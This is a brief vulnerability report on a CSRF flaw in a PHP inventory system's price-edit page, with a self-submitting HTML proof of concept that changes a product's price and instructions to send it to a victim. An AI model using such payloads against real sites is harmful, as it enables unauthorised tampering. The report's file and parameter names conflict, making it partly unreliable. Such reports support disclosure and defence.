official website:https://www.sourcecodester.com/php/4481/simple-inventory-system-using-phpmysql.html
version:v1.0
route:/tableedit.php#page=editprice
injection parameter:$_POST['itemnumber']
As shown in the figure below, in tableedit.php, after the front-end sends the modified price data packet through the form form, there is a lack of token verification mechanism, and the back-end updateproduct.php is directly spliced into the SQL update statement, resulting in a CSRF vulnerability. We can change client user data by constructing malicious request packets.
The construction poc is as follows. Save it as an html file and send it to the victim to click, so that the product price can be modified.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://10.15.6.184:82/updateprice.php" method="POST">
<input type="hidden" name="ITEM" value="1" />
<input type="hidden" name="itemprice" value="888" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
After clicking on the html file, the price is modified to 888.
